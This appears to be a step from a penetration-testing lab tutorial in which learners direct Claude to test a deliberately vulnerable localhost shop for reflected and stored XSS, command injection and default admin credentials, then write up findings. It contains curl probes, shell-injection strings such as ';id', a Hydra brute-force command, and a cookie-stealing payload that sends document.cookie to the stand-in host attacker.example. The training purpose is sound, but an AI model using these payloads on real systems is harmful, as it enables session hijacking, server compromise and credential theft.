Step 1: Test for Reflected XSS
Open materials/ttp-selection.md and find the reflected XSS entry. The target is any input that gets reflected back in the page response -- the search bar is the most obvious candidate.
Direct Claude to test:
Test the search functionality at http://localhost:8080/search.php for reflected XSS. Try injecting a basic script payload through the search parameter and check if the input is reflected in the page without encoding.
If Claude demonstrates with <script>alert(1)</script> and stops there, that confirms the vector exists but does not show the impact. An alert box proves the browser will execute arbitrary JavaScript. What matters for Ruta's customers is what an attacker could do with that execution -- access session tokens, read cookies, redirect to a fake payment page.
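You can reproduce the probe by hand with curl. This is a sketch, not the authoritative test: the search parameter name (`q` below) is an assumption -- confirm it against the actual search form before running, and note that the check only works while the lab is up.

```shell
# Hypothetical manual probe -- assumes the search parameter is named "q";
# check the real form field name in the page source first.
PAYLOAD='<script>alert(1)</script>'

# URL-encode the payload (python3 is used here only for encoding).
ENCODED=$(python3 -c 'import urllib.parse,sys; print(urllib.parse.quote(sys.argv[1]))' "$PAYLOAD")
echo "Probe URL: http://localhost:8080/search.php?q=${ENCODED}"

# Fetch the page and check whether the payload comes back verbatim
# (reflected without encoding) rather than HTML-entity escaped.
curl -s "http://localhost:8080/search.php?q=${ENCODED}" 2>/dev/null \
  | grep -q '<script>alert(1)</script>' \
  && echo "Reflected without encoding -- XSS likely" \
  || echo "Not reflected verbatim (server down, or input is encoded)"
```

If the response contains `&lt;script&gt;` instead of `<script>`, the input is being encoded and the vector is likely closed.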
Push for impact demonstration:
The alert box confirms the XSS vector. Now demonstrate the actual impact -- show that an attacker could access session cookies or tokens through this vulnerability. What could an attacker steal from a customer who clicks a crafted link?
AI commonly defaults to the alert-box proof of concept because it is technically sufficient for confirming the vulnerability. Professionally, a finding without impact demonstration is a half-finished finding. The severity difference between "JavaScript executes" and "an attacker can steal customer session tokens" is the difference between a medium-priority note and a high-priority fix.
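To make that severity difference concrete, a crafted link could carry a payload like the one below. The collection host `attacker.example` is a placeholder for an attacker-controlled server, not anything in the lab:

```shell
# Hypothetical impact payload -- "attacker.example" stands in for an
# attacker-controlled collection server; never point this at a real host.
# A victim clicking a crafted link carrying this payload would have their
# session cookie sent to the attacker in the resulting image request.
IMPACT_PAYLOAD='<script>new Image().src="http://attacker.example/c?d="+encodeURIComponent(document.cookie)</script>'
echo "$IMPACT_PAYLOAD"
```

Note this only works if the session cookie lacks the `HttpOnly` flag -- worth recording in the finding either way, since it changes the exploitation story.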
Step 2: Test for Stored XSS
Stored XSS is a different animal. Reflected XSS requires a crafted link -- someone has to click it. Stored XSS persists in the database and executes for every visitor who loads the page.
The product review system is the target. Direct Claude to submit a review containing a script payload:
Submit a product review on one of the amber jewelry product pages at http://localhost:8080/product.php that contains an XSS payload. Then load the product page in a fresh context to confirm the payload persists and executes for any visitor.
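A manual version of that check might look like the sketch below. The form field names (`product_id`, `review`) and the query parameter are assumptions -- read the real review form before running:

```shell
# Sketch of a manual stored-XSS check. The field names "product_id" and
# "review" are assumptions; confirm them against the actual review form.
PAYLOAD='<script>alert(document.domain)</script>'

# Submit a review containing the payload.
curl -s -X POST "http://localhost:8080/product.php" \
  --data-urlencode "product_id=1" \
  --data-urlencode "review=${PAYLOAD}" >/dev/null 2>&1

# Re-fetch the page with no cookies -- a fresh context -- and check
# whether the payload persisted unencoded.
curl -s "http://localhost:8080/product.php?id=1" 2>/dev/null \
  | grep -q "$PAYLOAD" \
  && echo "Payload stored and served unencoded -- stored XSS confirmed" \
  || echo "Payload not found verbatim (server down, or input is sanitized)"
```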
If the payload executes on page load, every customer browsing that product would have the script running in their browser. For Ruta's shop serving customers in 15 countries, a stored XSS in the product reviews means every visitor to that page is a potential victim -- not just someone who clicked a specific link.
This is why the TTP selection ranks stored XSS as higher priority than reflected. The blast radius is the entire audience of that page, not a single targeted click.
Step 3: Test for Command Injection
Command injection is a different category entirely. XSS runs in the customer's browser. Command injection runs on the server itself.
Look at the reconnaissance data from Unit 2. Any endpoint that processes user input through server-side utilities -- file handling, export features, order processing -- is a candidate. Direct Claude to test:
Test for command injection on server-side endpoints that process user input. Look at the order processing or file handling functionality. Try payloads that would execute system commands if the input is passed to a shell.
If command injection succeeds, the attacker has access to the operating system. They could read the database credentials from the configuration file, list the contents of the server, or install persistent access. The impact is fundamentally different from XSS -- this compromises the server, not the customer's browser.
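Shell-metacharacter probes follow a small set of patterns. The endpoint and parameter below (`export.php`, `file`) are hypothetical stand-ins for whatever your reconnaissance actually surfaced:

```shell
# Classic injection probes, appended to whatever value the endpoint expects.
# "export.php" and "file" are hypothetical -- substitute the real endpoint
# and parameter from the Unit 2 reconnaissance data.
for INJ in ';id' '|id' '$(id)' '`id`'; do
  ENCODED=$(python3 -c 'import urllib.parse,sys; print(urllib.parse.quote(sys.argv[1]))' "$INJ")
  echo "Try: http://localhost:8080/export.php?file=report${ENCODED}"
done
# If any response contains "uid=" output from id(1), the input reached a shell.
```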
Task-sizing matters here. Directing Claude to "test for all vulnerabilities at once" produces worse results than focusing on one type at a time. Each vulnerability type requires a different approach, different payloads, and different interpretation of results. Keep the requests focused.
Step 4: Test Credentials with Hydra
The admin login panel is the target. Hydra is a new tool -- it automates credential testing against login forms by trying username/password combinations from a wordlist.
Direct Claude to run Hydra against the admin login:
Use Hydra to test for weak credentials on the admin login at http://localhost:8080/admin/. Use a small targeted wordlist focusing on common defaults -- admin/admin, admin/password, admin/123456. Report what Hydra finds and how many attempts it took.
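A plausible invocation looks like the sketch below. It is printed rather than executed so the assumed parts stay visible: the login script path, the form field names, and the failure string all have to come from the real login form and a real failed-login response.

```shell
# Build a small targeted wordlist of common defaults.
printf '%s\n' admin password 123456 changeme > /tmp/small-passwords.txt

# Hydra invocation sketch (echoed, not run). "/admin/index.php", the
# "username"/"password" field names, and the failure marker "Invalid" are
# assumptions -- inspect the real form and a failed login to fill them in.
echo hydra -l admin -P /tmp/small-passwords.txt \
  -s 8080 localhost http-post-form \
  '/admin/index.php:username=^USER^&password=^PASS^:F=Invalid'
```

Getting the failure string wrong makes Hydra report every password as a hit, so verify one manual failed login before trusting the results.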
Hydra prints any credentials it finds on a clearly marked result line. AI will present a successful find as definitive -- "the admin password is admin." Check the output yourself before accepting the claim. A successful credential find against a default username on an admin panel is significant for Ruta's shop. If anyone on the internet can log into the admin panel with admin/admin, they have access to customer data, order history, and the ability to modify the shop.
Consider what this means in context. Ruta's nephew Tomas set up the admin account when he was building the shop as a student. Whether he changed the default password determines the severity. The tool finding is one thing. The business impact for a shop storing customer addresses in 15 countries is another.
Step 5: Document All Findings
You now have multiple confirmed findings across different vulnerability types. Each one has a different impact, a different exploitation method, and will need a different detection rule in the next unit.
Direct Claude to compile the findings:
Document each confirmed finding with: the vulnerability type, the specific endpoint tested, the exploitation method, the evidence collected, the impact assessment specific to Ruta's shop and customers, and the ATT&CK technique mapping from the TTP selection document.
Each finding should stand on its own. A finding without reproduction steps cannot survive peer review. A finding without impact assessment cannot be prioritized. A finding without ATT&CK mapping cannot be contextualized within a broader threat model.
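One way to keep findings consistent is a shared template. This sketch mirrors the fields in the prompt above; the section names are suggestions, not a required format:

```shell
# Write a minimal per-finding template covering the fields listed above.
# The ATT&CK technique IDs come from materials/ttp-selection.md.
cat > /tmp/finding-template.md <<'EOF'
## Finding: <short title>

- Vulnerability type: <e.g., Stored XSS>
- Endpoint: <e.g., http://localhost:8080/product.php>
- ATT&CK mapping: <technique ID from the TTP selection document>

### Exploitation method
<payload used and steps to reproduce>

### Evidence
<request/response excerpts, screenshots, tool output>

### Impact assessment
<what this means for Ruta's shop and customers, not just "vulnerable">
EOF
wc -l /tmp/finding-template.md
```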
This documentation is the input for the next three units: detection rules, remediation, and the final report. What you collect now determines what you can deliver later.
✓ Check: At least two different vulnerability types confirmed with evidence. Each finding has an impact assessment beyond "vulnerable."